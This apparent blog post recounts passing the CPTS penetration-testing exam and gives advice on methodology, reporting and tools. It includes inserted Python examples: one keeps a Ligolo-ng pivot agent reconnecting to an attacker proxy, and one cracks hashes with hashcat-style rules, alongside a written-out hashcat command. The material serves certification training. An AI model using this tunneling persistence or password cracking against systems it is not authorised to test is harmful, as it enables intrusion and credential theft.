
The First Step
A year ago I had never solved a single Hack The Box machine. I had heard of flags and CTFs but had never run a port scan against a target I owned, and couldn’t have told you the difference between a foothold and a pivot. I was starting from zero with TryHackMe intros and an OK understanding of networking (CCNA), in a field whose main tagline is Try Harder.
I’m telling you that because the rest of this article is going to talk about passing the CPTS with 14 out of 14 flags, and I want that to land with the right context. This is achievable. The path is real. The course materials work. Six months of deliberate work got me from nothing to the top of one of the hardest practical certifications in the field.
It also took two attempts.
Fully Owned
When I finished the CPTS exam I had 14 flags. The exam was fully owned. On my second attempt.
The first attempt is the part I don’t see many people talk about honestly, so I will. I sat the exam and spent seven days stuck on the first flag. I did what most people do: looked online for hints, suggestions, anything that would move the needle. I found posts that talked about completing the CPTS track (I had), that the first flag was a gatekeeper, and my personal favorite: “Enumerate More.” What does that actually mean? Finally on my third Enumerate More pass I found the thing I had missed. Was it simple, dumb, and avoidable? ABSOLUTELY. After that I spent the last three days in a scramble that got me to flag nine before time ran out. Nine flags. I even got past the dreaded eighth flag. But I had failed.
I want to be clear about what happened there, because it wasn’t a skills problem. By the time I sat that first attempt I had the technical knowledge to pass. What I didn’t have was an understanding of what the exam was actually testing for, or how to approach a network I’d never seen before without any external structure to guide me. I was trying to work through it the way I’d worked through module labs, the way I had tackled AEN (Attacking Enterprise Networks, the final module of the path), trying to figure out what obvious thing I had missed. Seven days on one flag isn’t a skills gap. It’s a methodology gap.
On the second attempt I understood the exam. I knew what I was actually doing and why, had taken the time to approach the course material with fresh eyes, and I cleared the remaining flags in three days.
I’m not leading with any of this to brag. I’m leading with it because when I was preparing, I spent a lot of time reading posts from people who had passed, trying to understand what they actually did to get there. Most of what I found was vague. “Trust the process.” “Complete the path.” “You’ll know when you’re ready.” Direct exam hints aren’t allowed, and that’s fair. But that advice is only useful in hindsight. What I needed was something that would help me understand and assess where I actually stood before the exam.
So this is my attempt to be more specific. What the exam is, what it demands, what the path prepares you for, and where you’ll have to fill the gaps yourself. Basically, I’m going to try to explain what “Enumerate More” actually means.
What You’re Signing Up For
The CPTS is a ten-day practical exam. You get access to a network and the objective is to compromise it, escalating your access across systems and collecting flags along the way. At the end you submit a professional penetration testing report. The report is graded. You can pass the technical portion and still fail if your report doesn’t meet the standard.
Ten days sounds like a long time. It isn’t.
You will lean on web exploits, common privilege escalation paths, and some less common ones, along with CVE research, tunneling, ACL abuse, and hash cracking. Basically everything in the course. The one thing I will say clearly: I never had to brute force a password during the exam. There will always be a clue.
The exam is designed around a realistic engagement. You’re enumerating a network you’ve never seen before, building a picture of what’s there, finding attack paths, and executing them. There’s no answer key. There’s no hint system. When you’re stuck, you figure it out. When you go down a rabbit hole for two hours and find nothing, you back out and try something else.
That’s the job. The exam is testing whether you can do the job.
What the Path Prepares You For
The HTB Academy CPTS path is long. If you’ve completed it, you already know this. It covers a wide range of material, and it covers it well. By the time you finish, you should have solid footing in enumeration, common exploitation techniques, privilege escalation on both Linux and Windows, Active Directory attacks, lateral movement, and web application vulnerabilities.
The modules are genuinely good. The labs are hands-on. The skills you build are the skills the exam tests.
Complete the path. Do the skills assessments. Take the module labs seriously instead of copying commands and moving on. The people who get to the exam and feel underprepared are almost always the ones who rushed through the material to get to the end. Don’t just copy sections of the course into your notes. Build a usable set of cheat sheets you can actually understand quickly. If you can’t do that, you probably don’t understand the material yet. That’s OK, move on and come back to it. Some sections only made sense to me on a second pass.
What the Path Doesn’t Prepare You For
Here’s the part nobody talks about enough.
The CPTS path teaches you techniques. The exam tests whether you can deploy those techniques in an unfamiliar environment, under pressure, over a sustained period of time, without someone telling you which one to use next.
That’s a different problem.
In a module lab, the context tells you what to look for. You’re working through a web application exploitation module, so you already know web application techniques are relevant. The exam gives you nothing. You walk in, you run your initial enumeration, and everything you do from that point forward is a judgment call. What matters here? What’s a rabbit hole? Yes, there will be rabbit holes, and they will look real. I had a few dead-end exploits that still ended up as additional findings in my report.
The key thing to remember is that the CPTS doesn’t care whether you can search an entire file system for the word “password” or track down a niche CVE. That won’t get you flags. Be smart about your searches and your attacks. LOOK FOR THE CLUES.
The other thing the path doesn’t fully simulate is the sustained effort. Ten days on a single target is a different experience from completing labs module by module. You will hit stretches where nothing is working. You will second-guess paths you’ve already ruled out. You will feel, at some point, like you’ve missed something obvious. Almost everyone who passes goes through this.
The question is what you do when it happens.
The Answer Is Not AI
Claude, Gemini, and ChatGPT are tools, and they are allowed on the exam. Should you use them? The answer is a hesitant yes.
When you’re stuck and banging your head against a problem, this is not when AI comes to the rescue. For me, this is where AI wasted the most time. Most of the time it will have you check things you’ve already done, send you down complicated searches that are out of scope for the CPTS, and then cycle back to the beginning and start all over again.
Have you ever seen a person walking their dog, but really it’s the dog walking the human? That’s the situation you don’t want to be in. I can say with confidence that AI did not lead me to a single flag. I actually had to fight it constantly when I wanted to try something I thought might work and just needed help with command syntax. I was told “this is the answer” on rabbit holes, and “this is a dead end” on what turned out to be the solution.
So when should you use AI? I don’t have a clean answer anymore. Between its refusal to help with anything that sounds like “harmful activities” and its tendency to hallucinate commands across tool versions, it’s left me here: it’s up to you. Just know when you’re fighting the AI instead of the exam. For me the best answer was to go for a walk. By the time I got back I’d have four or five ideas I hadn’t tried yet.
The Report Is Half the Exam
I want to be direct about this because I think a lot of people under-prepare for the reporting side: the report is not an afterthought. It is graded as part of the exam. You can find all the flags and still fail if your report doesn’t hold up.
A professional penetration testing report has a structure. Each finding needs to be clearly written, with an explanation of what the vulnerability is, how it was exploited, what the business impact is, and what the remediation looks like. The audience for a real report isn’t another pentester. It’s a technical lead or a manager who wasn’t in the room when you did the work.
If you’ve never written a pentest report before, do it before you sit the exam. Take a completed HTB machine or pro lab and write it up as if you were delivering it to a client. Practice the structure. Practice explaining findings clearly. By the time you’re in the exam, the reporting should be mechanical. You should be filling in a template you already know, capturing notes as you work, and writing up findings as you find them instead of trying to reconstruct everything in the last 24 hours.
Yes, use AI here. Use it to help with technical voice and language. I wrote my findings after every flag as I went. If you want examples of what a finished report looks like, every box on this site has a report attached. That’s what worked for me.
Staying In It
There will be a moment, probably around day four or five, where you’ve been at this for a while and you feel like you’re spinning. You’ve tried things. Some of them worked. Some didn’t. You’re not sure if the next step is something you know how to do or something you’ve missed entirely.
This is normal. Push through it. Take that walk.
The temptation at that point is to start running tools randomly hoping something surfaces, or to convince yourself that a flag you haven’t found yet requires a technique you haven’t learned. In my experience, there are clues. What have you found that’s weird? A solid methodology will surface the weird stuff, but you have to recognize it as different. Also remember that the flags have an order. Don’t chase root when you haven’t established a foothold. That’s not how this exam works. There is a path.
The problem is usually that you’re tired and the thinking isn’t as clear as it was on day one.
Take breaks. Sleep. Come back with fresh eyes. A path that was invisible at 2 AM has a way of becoming obvious after eight hours of sleep. The exam gives you ten days for a reason.
Before You Book It
A few things I’d want someone to know before they sit this exam.
People say do the Pro Labs. Dante especially. Truth be told, I didn’t. I completed the CPTS track plus two boxes that came up repeatedly in other people’s suggestions: Forest and Tombwatcher. The reason I could skip the pro labs is that I watched videos on Ligolo and how to tunnel, double tunnel, and triple tunnel, then went back to the tunneling and pivoting section of the course and re-did those assessments with Ligolo until it was second nature. If you need help with the commands, I have a Ligolo page in my methodology.
The CPTS track boxes are retired machines and will have some solutions that fall outside the scope of CPTS learning. Keep that in mind and take away the ideas, not the commands.
Take notes as you go through the path and keep them. Your own notes, organized in a way that makes sense to you, are more useful in the exam than any external resource. You will want to reference something you did three months ago, and if you don’t have notes, you’re starting from scratch.
Three tools are worth knowing better for the exam than what the course covers on its own:
- NetExec (NXC), formerly CrackMapExec. There’s a module you can take outside the CPTS path. Spend the cubes you’ve earned from the course on it. NXC is one of my most-used tools.
- Ligolo. It beats chiseling and proxychaining everything. It will drop occasionally, and as long as you know how to respond when it does, you’ll be fine. I probably had to restart a tunnel at least 50 times during the exam. It’s still easier than what the course teaches.
- BloodyAD. PowerView exists and people love it, but BloodyAD made dealing with ACLs significantly easier for me.
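The drops are manageable if the agent comes back on its own instead of you noticing ten minutes later that every scan through the tunnel died. The following Python is an added example, not code from this post or from the Ligolo-ng project: it wraps the agent in a restart loop with a growing delay and a cap so a dead proxy does not spin forever. The proxy address 10.10.14.5:11601, the ./agent path, and the assumption that the agent exits non-zero when it loses the proxy connection are all hypothetical.

```python
"""Keeping a Ligolo-ng agent alive across tunnel drops.

Added example, not code from the original post or from Ligolo-ng.
Assumptions (hypothetical): the proxy listens on 10.10.14.5:11601, the
agent binary is ./agent in the current directory, and the agent process
exits with a non-zero code when it loses the proxy connection.
"""
import subprocess
import time

# Assumed attacker address; -connect and -ignore-cert are Ligolo-ng agent flags.
AGENT_CMD = ["./agent", "-connect", "10.10.14.5:11601", "-ignore-cert"]


def keep_alive(argv, max_restarts=50, base_delay=2.0, max_delay=30.0,
               runner=subprocess.call, sleeper=time.sleep):
    """Run argv and restart it every time it exits non-zero.

    Returns the number of restarts performed. Exit code 0 is treated as a
    deliberate shutdown and ends the loop; after max_restarts restarts the
    loop gives up rather than hammering a proxy that is not coming back.
    The delay between restarts grows linearly up to max_delay.
    runner and sleeper are injectable so the logic can be exercised
    without a real tunnel.
    """
    restarts = 0
    while True:
        rc = runner(argv)
        if rc == 0 or restarts >= max_restarts:
            return restarts
        restarts += 1
        sleeper(min(base_delay * restarts, max_delay))


if __name__ == "__main__":
    # Run this on the pivot host. On the attacker side the routes on the
    # ligolo tun interface normally survive; the session in the proxy
    # console does not, so select the new session and run start again.
    n = keep_alive(AGENT_CMD)
    print(f"agent stopped after {n} restarts")
```

The linear backoff is deliberate: the first reconnect is almost immediate, so a momentary drop costs you seconds, while a proxy that is genuinely down is retried at a polite interval instead of in a tight loop.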
Then follow the “Take AEN Blind” advice. It’s the closest you’ll get to the exam experience, but a key difference is that AEN walks you through flags one at a time, while the exam chains vulnerabilities together to reach a single flag. Not much different in skill, but a different mindset. I wish I had understood that before my first attempt.
Get your report template ready before you start. Know what your findings sections look like, how you’re going to structure the executive summary, what your remediation language sounds like. The last thing you want is to be figuring out report structure while you still have flags to find.
Book the exam when you feel ready, not when you feel certain. The first attempt doesn’t count. That’s your learning attempt, the one where you see how everything I’m describing actually fits together. If you’ve completed the path, done the assessments seriously, and worked through the CPTS track, you have the skills. The rest is execution.
What It Meant
14 flags. I walked out of that exam having found everything there was to find. I learned to “Enumerate More” and actually understood what it meant. Here’s what it means to me.
- It’s a command to be smart about where you search. When you get a foothold, look first around where it drops you. Check that folder, check the parent folder. Operating as a user, check the user directories. Do you have full write permissions on a specific folder? Check that folder.
- Know what your tools can do and how to get more out of them. Know which tools overlap. Subdomains and vhosts can be found with dig axfr (a zone transfer, when the DNS server allows it), with ffuf, or with gobuster; Feroxbuster and Gobuster overlap again for directory brute-forcing. You get the idea.
- It means trying more than one wordlist. There’s a reason small, medium, and large lists exist. If rockyou on its own isn’t cracking a hash, run it through a rule set such as hashcat’s best64.rule. Try other rules.
“Enumerate More” is more than running tools. It’s more than deep searches. It’s taking the clues you’re given and understanding how to work with your toolset. What tool to use. How to use it better. Making educated guesses: this user looks like a clue, and I found this password somewhere odd. Maybe they go together. These are the things I wish I had understood before my first attempt, and had fully embraced by my second.
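To make the wordlist-plus-rules point concrete: hashcat applies each line of a rule file to each wordlist entry, so `hashcat -m 1000 ntlm.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule` (the rules path is the usual Kali location) tries mangled variants of every word rather than a bigger list. The following Python is an added example, not from the original post or from hashcat: it implements a handful of hashcat rule operations (`:`, `l`, `u`, `c`, `r`, `$X`, `^X`, `sXY`) and shows a constructed four-word list cracking a hash that the bare list misses. The unsalted SHA-1 target, the wordlist and the rule set are all constructed for the example.

```python
"""Why rules matter when a wordlist alone fails.

Added example, not from the original post or from hashcat. It implements a
few hashcat rule operations and runs a constructed wordlist through them.
Unsalted SHA-1 is used only because it is trivial to compute here; the
target hash and the wordlist are made up for the example.
"""
import hashlib

# Constructed wordlist standing in for a slice of rockyou.
WORDLIST = ["password", "summer", "welcome", "letmein"]

# A few rules in hashcat syntax, roughly the shape of entries in best64.rule.
RULES = [":", "l", "u", "c", "r", "$1", "c$1", "c$!", "sa@", "cso0",
         "$2$0$2$4", "c$2$0$2$4$!"]


def apply_rule(word: str, rule: str) -> str:
    """Apply one hashcat-style rule string to a word."""
    out = word
    i = 0
    while i < len(rule):
        op = rule[i]
        if op == ":":            # no-op: keep the word as-is
            pass
        elif op == "l":          # lowercase everything
            out = out.lower()
        elif op == "u":          # uppercase everything
            out = out.upper()
        elif op == "c":          # capitalize first letter, lowercase the rest
            out = out[:1].upper() + out[1:].lower()
        elif op == "r":          # reverse
            out = out[::-1]
        elif op == "$":          # append the next character
            i += 1
            out += rule[i]
        elif op == "^":          # prepend the next character
            i += 1
            out = rule[i] + out
        elif op == "s":          # replace every X with Y
            out = out.replace(rule[i + 1], rule[i + 2])
            i += 2
        else:
            raise ValueError(f"unsupported rule op {op!r} in {rule!r}")
        i += 1
    return out


def sha1_hex(plaintext: str) -> str:
    """Unsalted SHA-1 of a string, hex encoded (stand-in for the exam hash type)."""
    return hashlib.sha1(plaintext.encode()).hexdigest()


def crack(target_hex: str, words, rules, algo: str = "sha1"):
    """Try every word x rule candidate; return (plaintext, word, rule) or None."""
    for word in words:
        for rule in rules:
            cand = apply_rule(word, rule)
            if hashlib.new(algo, cand.encode()).hexdigest() == target_hex:
                return cand, word, rule
    return None


if __name__ == "__main__":
    target = sha1_hex("Summer2024!")          # constructed "exam" hash
    print("bare wordlist:", crack(target, WORDLIST, [":"]))
    print("with rules:   ", crack(target, WORDLIST, RULES))
```

The bare list never tries `Summer2024!`, but four words times twelve rules does, which is the whole argument for reaching for a rule file before reaching for a bigger wordlist. Real rule files are thousands of lines, and the candidate space is words times rules, so a small list with rules often finishes faster than a huge list without them.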
The CPTS is a hard exam. It’s designed to be hard. It’s testing something real, and that means it requires real preparation. But it’s also designed to be passable by someone who has put in the work. The path is good. The material is comprehensive. If you’ve done the work, the exam is a chance to show it.
The cert isn’t the main goal. It’s just the proof that you put in the work. The real goal is to understand and be comfortable doing the job.